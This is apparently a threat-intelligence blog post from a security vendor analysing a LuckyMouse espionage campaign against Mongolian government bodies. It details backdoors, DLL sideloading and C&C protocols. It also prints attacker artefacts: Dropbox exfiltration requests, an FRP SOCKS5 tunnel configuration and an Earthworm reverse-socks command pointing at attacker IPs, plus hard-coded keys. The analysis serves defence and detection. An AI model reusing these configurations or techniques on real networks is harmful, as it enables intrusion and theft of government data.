APT Group Targeting Governmental Agencies in East Asia

Introduction 

This summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center of Mongolia. We consider with moderate confidence based on our research that the chinese-speaking APT group LuckyMouse is behind the attack. 

The APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities on the compromised network such as scanning of the local network and dumping credentials. We presume that the main aim of cyber-espionage was the exfiltration of sensitive data from potentially interesting government agencies.

According to our local telemetries, we consider that the government institutions were attacked in two ways. One was through a vulnerable company who is providing services for these agencies, and the other was through an email spear-phishing with a malicious attachment – a weaponized document using CVE-2017-11882. 

There are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing some previously undocumented tactics indicating that the actors have updated their toolset with Polpo and LuckyBack backdoors. Our analysis below will highlight those new tactics. 

Attribution & Clusterization

We base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found during the investigation of this campaign, most of them having previously been attributed to LuckyMouse by other researchers[1][2][3].

In 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing Asian government resources. Their blog posts described several tool sets such as network filtering driver NDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors), and Earthworm tunneler. They also described a DLL sideloading technique abusing legitimate applications from Symantec (IntgStat.exe). This is a legitimate application that loads a DLL pcalocalresloader.dll. By sideloading their own version pcalocalresloader.dll, they load HyperBro RAT from a compressed and encrypted file thumbs.db. While some of the tools that were used were publicly known tools that are available on the internet, the group also developed their own tools, including a rootkit[1][2].

In April 2019, PaloAlto Networks released a blogpost about LuckyMouse. According to the post, the group installed webshells on a SharePoint server to compromise Government Organizations in the Middle East. Similarly, the group used several publicly known and available tools (such as mimikatz, curl, ntbscan). But what got our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT attack we analyzed also used a DLL sideloading technique, although with different executables. The executable used was a Symantec application thinprobe.exe that loads thinhostprobedll.dll. This DLL was then used to sideload thumb.db that contained encrypted and compressed HyperBro[3].

We’ve also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This backdoor was accompanied by samples that are known to be used by the LuckyMouse group which lead us to the conclusion that this backdoor is a new addition into LuckyMouse’s toolkit. We also observed more common tools, e.g. VMProtect-obfuscated Earthworm tunneler, a custom installer dropping NDISProxy network filtering driver, and various network scanners.

Infection Chain

We observed that this APT group was also targeting an unknown company that was providing services to government institutions in East Asia. The group infiltrated the company’s computers and managed to harvest credentials belonging to the company’s email accounts. Unfortunately, we haven’t been able to identify which attack vector was used in this infiltration. These credentials were then used to send emails from the hacked company’s email accounts to the government officials. While we were unable to recover the whole email, we’ve managed to recover the email’s header. The header indicates that these emails were asking the recipient to update a firmware, i.e. launch a self-extracting 7-zip archive attached to this email.

Date: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT) 
Subject: Re: Perform a firmware update on the server

XXXXXX_update.exe 

(sha256:2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D)

This archive drops three already familiar files – Symantec’s thinprobe.exe, malicious thinhostprobedll.dll, and thumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally loading its processed content – a HyperBro RAT . This backdoor has also been reported on by Kaspersky[1] and PaloAlto Networks[3], the latter providing an extensive description of the HyperBro RAT.

Figure 1: Overview of infection vector

Toolset

In this following section we describe a tool set we found on the victim’s PC, used by the APT group for cyber-espionage and lateral movement through the network. We could divide these tools into three categories:

  • Helpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector
  • Remote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo
  • Publicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler

In detail, we found the following tools:

StartServiceTool

This tool installs wcm.dll into %WINDIR%\system32, a registry record

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsConnections Manager

is created with the following values:

Description: Makes automatic connect/disconnect decisions based on the network connectivity options currently available to the PC and enables management of network connectivity based on Group Policy settings.

DisplayName: Windows Connections Manager

ServiceDll: C:\Windows\system32\wcm.dll.

This effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts – embedded DLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the windows loader.

The embedded DLL is a 32-bit DLL written in GO with a single export Interface. This DLL did not exhibit any virtualization nor debugger checks. It expects a single argument, a base64-encoded and RC4 encrypted authorization token for a Dropbox account. The RC4 key “0000111122223333” is hard-coded in the DLL.

Initially, it tries do download a file from Dropbox via the HTTP API:

POST /2/files/download HTTP/1.1
Host: content.dropboxapi.com
User-Agent: Go-http-client/1.1
Content-Length: 0
Authorization: Bearer [snipped]
Dropbox-Api-Arg: {“path”: “/infos/000000.txt”}
Accept-Encoding: gzip

If the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox:

POST /2/files/upload HTTP/1.1
Host: content.dropboxapi.com
User-Agent: Go-http-client/1.1
Content-Length: 36
Authorization: Bearer [snipped]
Content-Type: application/octet-stream
Dropbox-Api-Arg: {“path”: “/infos/116a0d.txt”,”mode”: “overwrite”,”autorename”: true,”mute”: false,”strict_conflict”: false}
Accept-Encoding: gzip

%currentDate% %currentTime%##%hostname%

Afterwards, a C&C request-response loop is started. Based on the response from the C&C server, one of the following commands is executed: download files, upload files, sleep, quit, or execute commands on a command line. See the following diagram for a detailed flow, keep in mind that all download/upload are using the aforementioned Dropbox API:

Figure 2: Overview of detailed execution flow

ServiceInstaller

We assume that this installer is intended to be executed by one of the aforementioned backdoors as it requires command-line parameters for its successful execution:

Switch Argument
-i  path of DLL to install as a service
-u Uninstall a specific service name

At first, security descriptors of both %windir%\system32\ and %windir%\system32\drivers\ changes to allow the current user to copy files to these locations. Then the installer copies a service executable to %windir%\system32\ under a randomly generated name (4 alphanumeric characters).

Depending on whether a service named DFS Replication already exists in 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost netsvcs,

a new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is created. More specifically, its parameters are:

Description: “Configures Internet Authentication Service (IAS). If this service is stopped, the remote network access that requires user authentication will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is used to roam folders between PCs; on the server, it is used to provide high availability and local access across a wide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server become out-of-date. If the service is disabled, any services that explicitly depend on it will not start.”
DisplayName: DFS Replication/IAS Jet Database Access Service %number%
ServiceDll: C:\Windows\system32\<4 random alphanumeric characters>.dll.
Tag: 0
Security: 0

ShellCodeExecutor

This utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for decoding and unpacking can be seen below:

Figure 3: Decoding algorithm and executing decoded payload in allocated memory

While we weren’t able to reconstruct which stage this executor was used, we were able to recover its parameter that corresponds to a hex-encoded metasploit-generated shellcode (reverse HTTP proxy – Github configured to connect to URL oss.chrome-upgrade[.]com (202.59.9[.]58). We suspect that the threat actors used the shellcode just to retrieve and execute a further stage from the C&C server.

DataExtractor 1

This tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions. It recursively scans all connected drives for such documents that were modified in 2020 and later. Gathered documents are packed using Winrar and the archive is protected with a password “zaq1xsw@cde3”. This archive will be then saved to C:\MSBuild\NVIDIA\ under a filename CRYPTO-%computerName%-%number_value%.SYS. This scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after reboot), only documents that were modified in the last 24 hours are gathered.

After each run, a file %windir%\system32\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C&C. Unfortunately, we were not able to recover this script.

DataExtractor 2

This binary is a simple filescanner that is provided with a list of file extensions, a list of directories, and date boundaries as parameters. Every directory from the list is searched for files with a given file extension. If such files are found and their modification date is within the provided date boundaries (in UTC), their full paths are written down into the output file. These paths are delimited by Windows line delimiters and they are encoded in 16-bit Unicode.

Below you will see a part of an error message, providing us the information about how this utility is used:

T040ClientLite.exe suffix .txt,.xls scanDirs E:\\test,E:\\test1 output E:\\test\\output.txt startEditDate 2020/04/26 endEditDate 2020/04/27

More generally, the command’s format is:

T040ClientLite.exe suffix <file extensions> scanDirs <directories> output <output file> startEditDate <date> endEditDate <date>

Information Collector

The Information Collector focuses on removable drives. If no such drives are connected, its execution is terminated. The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with a 64 byte XOR key, and stores it onto the system drive as hidden files. More specifically, it uses the following directories:

C:\MSBuild\Resources\Format\S-1-1 (encrypted files)

C:\MSBuild\Resources\Format\S-1-0\S-1-0-0 (unencrypted temporary files, deleted after encryption)

Figure 4: Sample enumerate drives, checking their type with GetDriveTypeA

It ensures its persistence by adding itself into Run (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) registry key under AvpSecurity.

Interestingly, it contains many unused functions using command-line tools such as: systeminfo, arp, ipconfig, netstat, and tasklist. It also supports archiving the collected information using WinRAR with a hard-coded password “1qaz@WSX”. The sample has no networking capabilities. It primarily serves for collecting the information and transferring the gathered information using removable drives between the machines in the network.

Moreover, the particular sample we analyzed contained a bug in the drives’ enumeration routine that made it virtually useless as it hampered all the sample’s functionality.

RAT

Korplug (PlugX)

Korplug (PlugX) is a well-known Remote Access Trojan associated with Chinese speaking attackers and it has been used in a large number of targeted attacks since 2012[4]. It uses DLL side-loading to load itself into the memory through legitimate applications. It helps it stay unnoticed by any security product. Korplug is a fully featured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to a remote cmd.exe shell. 

In our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was signed with a valid, but expired certification. After executing unsecapp.exe, it loads a malicious DLL http_dll.dll. This DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug which is then loaded into the memory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped and executed these files.

Address of C&C servers: 

web[.]microlynconline[.]com:80
home[.]microlynconline[.]com:8000
help[.]microlynconline[.]com:443
host[.]microlynconline[.]com:53

Backdoors

We found three different backdoors in the government office network, two of which, PolPo and LuckyBack, were never seen in any previous campaign. Polpo also hits the National Data Center, and the two others, BlueTraveller and LuckyBack, only hit the government office network.

LuckyBack

LuckyBack collects the computer’s fingerprint, at first, and then tries to establish a communication with the C&C server (45.77.55[.]145). Once the communication is established, the backdoor starts listening for commands. It is capable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and screen capturing.

Technical:

At first, the used code page is retrieved by calling chcp, a command providing the keyboard and character set information, on the system drive.

The first request on the C&C server “registers” the device by providing its fingerprint. Namely, the fingerprint is constructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP address, code page, and RDP session ID.

If the server accepts the registration, it responds with the PID and a simple string “OK”. Afterwards, a simple request-response C&C loop is started, and commands and their corresponding numbers are displayed in the table below:

Commands Functions
0x70, 0x72 Receive data again
0x1, 0x11 Creates remote shell or quit remote shell
0x2 File size and last write from spec. file
0x3 It’s reads data from specific offset and file
0x4 Gets file size
0x12 Delete spec. file
0x13 Terminate specific thread
0x14 Receiving reading configuration
0x22 Execute %command% via CreateProcess API
0x23 Set a reading configuration for 0x3 command
0x24 Writes data to specific file
0x32 File operations (move file from one location to another)
0x50 Start keylogging
0x51 Stop keylogging
0x60 Take screenshot

BlueTraveller

This backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload, download, and execute on the command line. Nevertheless, it uses two layers of C&C servers, meaning that the first request is on the first layer, and it yields an IP address of a C&C server from the second layer. Afterwards, the request-response C&C loop uses the second layer. If the backdoor receives a command for the command line, the output from the console is encrypted with AES-256 and sent back to the second-layer C&C server.

The binary itself has its strings encrypted with RC4, using a hardcoded key “L!Q@W#E$R%T^Y&U*A|}t~k”. Among these strings, we may find the address of the first-layer C&C server and the user agent that should be used for these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. The response seems to be pretty inconspicuous at first glance. But once we have a look more closely, we see that many lines are followed by a mixture of tabs and spaces,which is rather fishy indeed. And surprisingly this is where the IP address of the second C&C layer hides!

Figure 5: Response from first layer of C&C server
Figure 6: Script which decrypts the white spaces from the html response

The BlueTraveller uses the same scheme for encryption – AES-256 with a key derived from a string that is hashed with SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C&C. For this first request, the key is derived from a string “0304276cf4f31345“. The key is then used to encrypt the generated GUID and the computer’s hostname which are then Base64-encoded and used to generate the request URL:  

http://<second_layer_C&C>/home/<rand number>/<enc_length>/<Base64 data>.

After this request is executed, commands are retrieved from:

http://<second_layer_C&C>/index.htm.

The obtained data is encrypted with AES-256, using the aforementioned approach with GUID as a base-string for the key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch, the command is discarded. If a command for the command line is received, the output of the executed command (AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to

http://<second_layer_C&C>/help/<rand number>/<enc_length>/<Base64 data>.

Polpo

Polpo is a backdoor that we’ve been seeing in the wild since 2018. It supports around 15 different commands including information collection and exfiltration, file transfer, and proxy connections.

Base64 IP
MjAzLjkxLjExOS40OjgwMDA=  203.91.119[.]4:8000
MjAyLjE3OS4wLjE0Mjo4MDgw 202.179.0[.]142:8080
MjAyLjE3OS41LjE2MTo0NDM=  202.179.5[.]161:443

Base64-encoded addresses of C&C servers are hard-coded in the binary

Polpo – Communication

The backdoor mimics the HTTP protocol to blend with the normal traffic. The transferred data is encrypted with AES and encoded into Base64 then sent as a part of fake HTML content. 

Figure 7: Comand data parsing

The AES encryption key is derived from the first packet of each new command received from the C&C server, using the algorithm below:

Figure 8: Encryption key computation

The sample checks for a proxy configured on the system found in the Registry Key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable. If a proxy is configured it uses the server specified in Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer for all the connections. 

Polpo – Functionality

There are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the commands are executed in separate threads. Errors and inter-thread communication are handled using Events.

Figure 9: Command dispatcher

These commands are supported by the version of Polpo we’ve analyzed:

Main commands Sub commands Functions
0x1FFFFFF   Initialize CLI Interface
  0x101FFFF CLI Spawn CMD.EXE
  0x102FFFF CLI Write Data To File
  0x103FFFF CLI List Directory
  0x104FFFF CLI ShellExecuteW(0, “Open”, Cmd, 0, 0)
  0x106FFFF CLI Change Directory
  0x107FFFF CLI Delete File
0x2EEEEEE   Commands
  0x201EEEE Enumerate Drives Info
  0x202EEEE Enumerate Files
  0x203EEEE Send File To C&C
  0x204EEEE Write Data To File
  0x 205EEEE Run Default App
  0x206EEEE Shell Execute Open
  0x207EEEE Delete File
  0x208EEEE Delete Files Recursive
0x3DD03DD   Serve As Proxy (Hide As Http)
  0x30103DD Get Data To Transfer
0x3DDDDDD   Serve As Proxy (Raw Data)
0x5FFFFFF   Close Connection
0x60AAAAAA   Close Connection
0x70BBBBBB   Reboot
0x80CCCCCC   Shutdown System
0xAFFFFFF   Send File To C&C

UAC bypass tool

An open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage) was detected on several compromised devices. It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to execute tasks and programs under administrator-level permissions. 

Port-scanners

Several different port scanners were seen on compromised devices under various filenames. One of the used port scanners was open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the ports of the server to find out which services were running.

Nbtscan

Nbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the network.

Passwords dumpers

Mimikatz and Lazagne were seen on the infected computers. We presume that they were used to retrieve credentials from the compromised computers. We’ve also spotted a wrapped Mimikatz version, download from https://github.com/jas502n/mimikat_ssp, on several compromised devices.

FRP

Fast Reverse Proxy (FRP) is a tool that allows you to expose local services that are hidden behind the NAT or a firewall to the internet. Both the raw TCP and UDP are supported as well as several other protocols whose requests can be forwarded to the internal services via this proxy. We’ve recovered a configuration file 3bef4cd.tmp for this proxy. The content of this proxy is the following:

[common]
server_addr = 202.59.9[.]58
server_port = 8443
privilege_token = %token%
[SDJY_proxy]
type = tcp
remote_port = 6001
plugin = socks5

It is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network via 202.59.9[.]58:8443.

Figure 10: Diagram of FRP tool usage

Earthworm tunneler

The Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky[1]. We’ve seen this tool on all compromised systems of national data center. On one of these devices, we’ve managed to recover command-line parameters that were used:  -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a SOCKS tunnel to the provided server. It is publically available at http://rootkiter.com/EarthWorm/.

Conclusions

As this blogpost demonstrates, LuckyMouse has used new methods to infiltrate the government institution through a third party’s system which they attacked. 

Avast has recently protected users in the government institution and national data center from further attacks using the samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in the whitespace of the C&C response. We presume that the attackers updated their attacking toolset in this campaign after it was discovered by Avast.

I would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research.

Indicators of Compromise (IoC)

MITRE ATT&CK techniques

Tactic

ID

Name

Comment

Initial Access

T1199

Trusted Relationship

Sending emails from hacked trusted email accounts

T1566.001

Spear Phishing Attachment

Emails with malicious documents and software updates

Execution

T1059.003

Windows Command Shell

 

T1204.002

Malicious File

 

T1203

Exploitation for Client Execution

Documents weaponized with CVE-2017-11882 – Equation Editor

T1106

Native API

Windows API CreateProcessW 

Persistence

T1547.001

Registry Run Keys

Using “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AvpSecurity”

T1543.003

Create or Modify System Process: Windows Service

Multiple samples create services for persistence

Privilege Escalation

T1548.002

Bypass User Access Control

WinPwnage tool

T1543.003

Create or Modify System Process: Windows Service

Installs services in: “HKLM\SYSTEM\CurrentControlSet\Services\”

Defense Evasion

T1574.002

Hijack Execution Flow: DLL Side-Loading

HyperBro was loaded,decrypted, decompressed and executed by a legitimate application using this technique.

T1564.001

Hidden Files and Directories

Hiding collected information in hidden directories and files

T1027

Obfuscated Files or Information

Collected information is encrypted using byte XOR operation

T1218.011

Rundll32

Executing shell code

T1218

Signed Binary Proxy Execution

thinprobe.exe (Symantec), unsecapp.exe (ESET)

Credential Access

T1003.001

LSASS Memory

Mimikatz

T1552

Unsecured Credentials

Lasagne

Discovery

T1083

File and Directory Discovery

Search for sensitive documents with extensions pdf, ppt, xls, doc

T1046

Network Service Scanning

used publicly available tools “nbtscan” and port scanner “s”

T1120

Peripheral Device Discovery

Searching for removable drives on the system

T1082

System Information Discovery

 

Lateral Movement

T1091

Replication Through Removable Media

Information Collector is capable of copying binary files to removable drives 

Collection

T1560.001

Archive Collected Data: Archive via Utility

hides exfiltrated documents in password-protected .rar archives.

T1119

Automated Collection

 

T1056.001

Input Capture: Keylogging

Used in LuckyBack backdoor

Command and Control

T1071.001

Application Layer Protocol: Web Protocols

Polpo: HTTP is used for communications with C2

T1132.001

Data Encoding: Standard Encoding

Polpo: Encrypted data is encoded as Base64

T1573.001

Encrypted Channel: Symmetric Cryptography

Polpo: Transfered data is encrypted with AES

T1104

Multi-Stage Channels

BlueTraveller: multiple C&C servers are used

T1090.001

Proxy: Internal Proxy

Polpo: serves as proxy in the network

Exfiltration

T1052.001

Exfiltration Over Physical Medium: Exfiltration over USB

Information Collector moves files in the network over removable drives 

T1567.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

StartServiceTool: Dropbox is used for exfiltration of collected data

T1041

Exfiltration Over C2 Channel

Polpo exfiltrated data to C&C server

References

[1] https://securelist.com/luckymouse-hits-national-data-center/86083/

[2] https://securelist.com/luckymouse-ndisproxy-driver/87914/

[3] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

[4] https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/

The post APT Group Targeting Governmental Agencies in East Asia appeared first on Avast Threat Labs.

Article Link: https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia